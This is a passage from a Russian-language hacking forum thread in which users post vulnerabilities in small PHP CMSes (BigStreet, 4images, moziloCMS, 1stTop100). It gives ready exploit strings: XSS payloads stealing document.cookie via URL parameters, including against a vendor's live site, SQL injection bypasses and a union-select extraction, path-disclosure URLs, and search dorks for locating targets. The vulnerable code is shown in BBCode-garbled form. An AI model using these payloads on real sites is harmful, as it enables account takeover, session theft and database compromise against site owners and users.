    while([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {

        if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"include/files/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]demo_file[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#FF8000"]//delete the file(s)

[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"include/files/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]demo_file[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_thumb"[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"include/files/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]demo_file[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_thumb"[/COLOR][COLOR="#007700"]);

            }

            if([/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"include/files/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]demo_file[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#FF8000"]//if file deleted, remove db entry

[/COLOR][COLOR="#0000BB"]$query2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_files` WHERE `id`="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIMIT 1"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

            }

        }

    }

[/COLOR][COLOR="#FF8000"]//delete all comments for the ban

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_comments` WHERE `bid`="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$bid[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#FF8000"]//get ban details

[/COLOR][COLOR="#0000BB"]$ban_row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql_get_ban_details[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$bid[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]//delete the ban

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `bid`="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$bid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIMIT 1"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#0000BB"]log_to_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Ban edit"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"Deleted ban: ID "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$bid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" ( )"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]//redirect to start page

[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]) {[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location:index.php"[/COLOR][COLOR="#007700"]); exit; }

}

[/COLOR][/COLOR]

Экспл:

Код:

Code:
$id = "id user";
$pat = "http://site.ru";
echo 

HTML;

#417

16.07.2010, 13:47

emillord

Участник форума

Регистрация: 20.01.2008

Сообщений: 284

Провел на форуме:
3767223

Репутация: 408

Отправить сообщение для emillord с помощью ICQ

BigStreet alpha RC1

(07.10.2010)

BigStreet CMS — система для создания сообществ.

Искать в гугле по запросу

Код:

Code:
Powered by BigStreet

XSS

Передаём в GET

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site/system/tools/yaca.parser.php?url=1alert(1).[/COLOR][/COLOR]

Сайт автора:

Цитата:

Сообщение от None

http://www.bigstreet.ru/system/tools/yaca.parser.php?url=1%3Cscript%3Ealert%281%29%3C/script%3E.

Недостаточная фильтрация входящих данных.

PHP код:


		
			
PHP:
[COLOR="#000000"][/COLOR]" style="width: 500px">

    $text = file_get_contents($first_url);

    $text = iconv('windows-1251', 'utf-8', $text);

    preg_match_all("/\d+/isU", $text, $matches);

    $text = file_get_contents($url);

    $text = iconv('windows-1251', 'utf-8', $text);

    preg_match_all("/([\d\w\.\-]*)/isU", $text, $matches);

[/COLOR]

XSS passive:

При вводе логина пароля

Цитата:

Сообщение от None

1alert(407747180852).

Страница http://site/feedback/

Уязвимо поле: Спросите, пожелайте, возмутитесь

Отправляем пост запрос с таким содержимым

alert()

#418

08.08.2010, 18:19

[Feldmarschall]

Участник форума

Регистрация: 06.01.2010

Сообщений: 136

Провел на форуме:
568388

Репутация: 87

4images 1.7.7

Раскрытие путей:

/categories.php?cat_id=2&page=-2

Код:

Code:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/site/includes/db_mysql.php on line 116

#419

09.08.2010, 00:12

[Feldmarschall]

Участник форума

Регистрация: 06.01.2010

Сообщений: 136

Провел на форуме:
568388

Репутация: 87

moziloCMS 1.0 - 1.1

XSS

/galerie.php

[PHP]
PHP:
[COLOR="#000000"]else {

$allindexes= array();

for($i=1;$i[COLOR="#007700"]alert(document.cookie)

[/QUOTE]
" if author else f"

Цитата:

/galerie.php?cat=10_Willkommen&index=1">alert(docum ent.cookie)

1.12.Beta 3 (Последняя версия)

XSS

Оф Сайт:

Цитата:

Сообщение от None

http://cms.mozilo.de/index.php?action=search&query=a">alert('XSS')&acti on.x=10&action.y=8&action=search

#420

15.08.2010, 20:02

SeNaP

Участник форума

Регистрация: 07.08.2008

Сообщений: 281

Провел на форуме:
3300342

Репутация: 165

[SIZE="3"][COLOR="Green"]1stTop100

->edit.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"submit"[/COLOR][COLOR="#007700"]] AND ![/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"edit"[/COLOR][COLOR="#007700"]]){

[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"pass"[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM top_[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#DD0000"]WHERE memberid = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"id"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"' AND password = '[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#DD0000"]"Невозможно подключиться к mysql"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

...

...

...

[/COLOR][/COLOR]

Expl:

Код:

Code:
POST
memberid=1' --

->out.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM top_[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#DD0000"]WHERE memberid = '[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#DD0000"]"Невозможно подключиться к MySQL"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"dmY"[/COLOR][COLOR="#007700"]);

while([/COLOR][COLOR="#0000BB"]$object[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$today[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$object[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]hitstoday[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$today[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" | "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$today[/COLOR][COLOR="#007700"]);

...

...

...

[/COLOR][/COLOR]

При register_globals = ON и magic_quotes_gpc = OFF

Expl:

Код:

Code:
$_GET['id'] = 1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21

Страница 42 из 52

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Библиотека	SladerNon	Болталка	17	05.02.2007 23:30

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход